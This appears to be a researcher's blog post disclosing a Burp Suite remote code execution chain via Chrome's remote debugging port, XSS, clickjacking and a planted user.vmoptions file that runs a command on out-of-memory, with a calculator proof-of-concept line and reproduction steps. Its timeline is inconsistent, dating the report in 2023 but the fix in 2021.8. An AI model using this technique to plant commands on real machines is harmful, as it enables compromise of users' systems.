Skip to main content
  1. posts/

Burp Suite RCE via Chrome Remote Debugging

Burp Suite utilizes an embedded Chrome browser for crawling and scanning web applications. While investigating the security implications of this architecture, I discovered a critical vulnerability that allows an attacker to achieve remote code execution on a victim’s machine by leveraging Chrome’s remote debugging interface in combination with a known XSS vulnerability and clickjacking attack. This issue is actually just another exploit case of this chrome rce I discovered.

The Vulnerability #

The vulnerability exists in how Burp Suite launches its embedded Chrome instance. Burp Suite uses Chrome in headless mode with remote debugging enabled via the remote-debugging websocket port (instead of the more secure remote-debugging-pipe). This design choice, combined with a known XSS vulnerability in Chrome that has been public since at least 2016 (documented in Chromium Issue 40084203), creates a dangerous attack vector.

The attack chain works as follows:

  1. An attacker hosts a malicious webpage that performs JavaScript port scanning to identify the randomized port used by Chrome’s remote debugging interface
  2. The same page uses clickjacking to trick the victim into clicking a button
  3. Once the port is identified and the user clicks, the attacker can compromise the WebSocket GUID for the remote debugging channel
  4. Using Chrome’s remote debugging APIs, the attacker triggers a file download to Burp Suite’s installation directory
  5. The downloaded file is a malicious user.vmoptions file that contains JVM flags designed to exhaust memory and trigger an OS command

The root cause is a combination of factors:

  • Burp Suite’s use of the websocket-based remote debugging transport instead of the more secure named pipe transport
  • Chrome’s known XSS vulnerability on chrome-devtools-frontend.appspot.com that allows JavaScript to interact with the remote debugging interface (Chromium Issue 40084203)
  • The ability to write files to Burp Suite’s installation directory through the remote debugging APIs

Affected Versions #

  • Affected versions: Burp Suite Professional/Community versions prior to 2021.8
  • Patched versions: Burp Suite 2021.8 and later

If you’re using an affected version, make sure to update to 2021.8 or later. The fix was released in Burp Suite 2021.8.

How It Works #

The attack scenario requires the victim to be running Burp Suite and scanning a web application:

  1. A user launches Burp Suite and starts a scan of a web application
  2. Burp Suite launches its embedded Chrome instance with remote debugging enabled on a random port
  3. The user (or Burp Suite’s crawler) navigates to a malicious webpage hosted by an attacker
  4. The malicious page uses JavaScript to port scan and identify the remote debugging port
  5. The page uses clickjacking to render a button that, when clicked, exploits the XSS vulnerability
  6. The exploit uses Chrome’s remote debugging APIs to download a malicious user.vmoptions file to /Applications/Burp Suite Professional.app/Contents/ (on macOS)
  7. The malicious file contains -Xmx5m (limiting JVM memory to 5MB) and -XX:OnOutOfMemoryError=open -a Calculator (executing a command when memory is exhausted)
  8. When Burp Suite is restarted, it reads the malicious user.vmoptions file, quickly exhausts memory, and executes the attacker’s command

The proof of concept demonstrates this by opening the Calculator app, but an attacker could execute any arbitrary command with the same permissions as the user running Burp Suite.

Proof of Concept #

The proof of concept consists of a malicious HTML file (burp.html) that:

  1. Performs JavaScript port scanning to identify the Chrome remote debugging port
  2. Uses clickjacking to render an interactive button
  3. Exploits the XSS vulnerability to access Chrome’s remote debugging WebSocket
  4. Uses the remote debugging APIs to download the malicious user.vmoptions file

To reproduce the vulnerability:

  1. Download the exploit HTML file and host it on a web server:

    python -m http.server

  2. Launch Burp Suite and start a new scan of the web server

  3. Open a Chrome browser and navigate to the hosted exploit page (e.g., http://127.0.0.1:8000/burp.html)

  4. Observe the JavaScript port scanner identifying the randomized remote debugging port

  5. Click the “CLICK ME!!!” button when it appears

  6. Restart Burp Suite and observe that the Calculator app launches (or whatever command was specified in the exploit)

The Impact #

This vulnerability is particularly dangerous because:

  • Full system compromise: An attacker can execute arbitrary commands on the victim’s system with the same permissions as the user running Burp Suite
  • Persistent access: The malicious user.vmoptions file persists across Burp Suite restarts, allowing for persistent command execution
  • Credential theft: An attacker could exfiltrate sensitive data, authentication tokens, or credentials stored on the system
  • Data exfiltration: An attacker could steal sensitive code, files, or other private data from the victim’s system

The attack is especially concerning because it targets security professionals who are using Burp Suite to test web applications. These users often have elevated permissions and access to sensitive systems, making them high-value targets.

Why This Is a Burp Suite Vulnerability #

According to Google’s security impact guidelines, the Chrome XSS vulnerability used in this attack would typically be considered to have no security impact since Chrome requires additional flags to run (--remote-debugging and --headless) [1]. The root cause of this vulnerability is documented in Chromium Issue 40084203, which details how the XSS vulnerability on chrome-devtools-frontend.appspot.com combined with clickjacking can be exploited to compromise Chrome’s remote debugging interface. Additionally, the XSS vector has been public since at least 2016 and reported in multiple Chrome bug tickets [2-6].

However, this is a legitimate Burp Suite vulnerability because:

  • Burp Suite could have used the named pipe transport (--remote-debugging-pipe) instead of the websocket transport, which would mitigate this issue
  • Tools like Puppeteer already support the more secure named pipe transport [7]
  • The vulnerability exists in Burp Suite’s design choices, not in Chrome itself

Disclosure and PortSwigger’s Response #

This vulnerability was reported to PortSwigger through their security program on October 10, 2023. PortSwigger’s security team responded promptly and released a fix in Burp Suite 2021.8. The fix addresses the vulnerability by implementing more secure handling of Chrome’s remote debugging interface.

The Fix #

In Burp Suite 2021.8, PortSwigger addressed this vulnerability by implementing more secure handling of the Chrome remote debugging interface. While the exact technical details of the fix haven’t been publicly disclosed, the recommended approach would be to:

  • Use the named pipe transport (--remote-debugging-pipe) instead of the websocket transport where possible
  • Implement additional security controls around the remote debugging interface
  • Validate and sanitize any file operations performed through the remote debugging APIs

Users should update to Burp Suite 2021.8 or later to protect against this vulnerability.

Takeaways #

This vulnerability highlights several important security lessons:

  1. Defense in depth: Even when using components with known vulnerabilities, applications should implement additional security controls to mitigate potential exploitation

  2. Secure defaults: When multiple transport mechanisms are available (websocket vs. named pipe), choose the more secure option by default

  3. File system access: Applications should be cautious about allowing file system operations through debugging or remote interfaces, especially when those interfaces are accessible from untrusted sources

  4. Security tool security: Security professionals and the tools they use are high-value targets. These tools should be designed with security as a primary consideration, not an afterthought

The fact that this vulnerability affected a security testing tool used by security professionals serves as a reminder that no software is immune to vulnerabilities, and even tools designed to find security issues can themselves have security flaws.

References #

  1. Chrome Security Impact Guidelines
  2. Chromium Issue 40084203 - Chrome Headless Remote Debugging RCE (Root Cause)
  3. Chromium Issue #607939
  4. Chromium Issue #618333
  5. Chromium Issue #619414
  6. Chromium Issue #775527
  7. Chromium Issue #798163
  8. Puppeteer PipeTransport Implementation
  9. Burp Suite 2021.8 Release Notes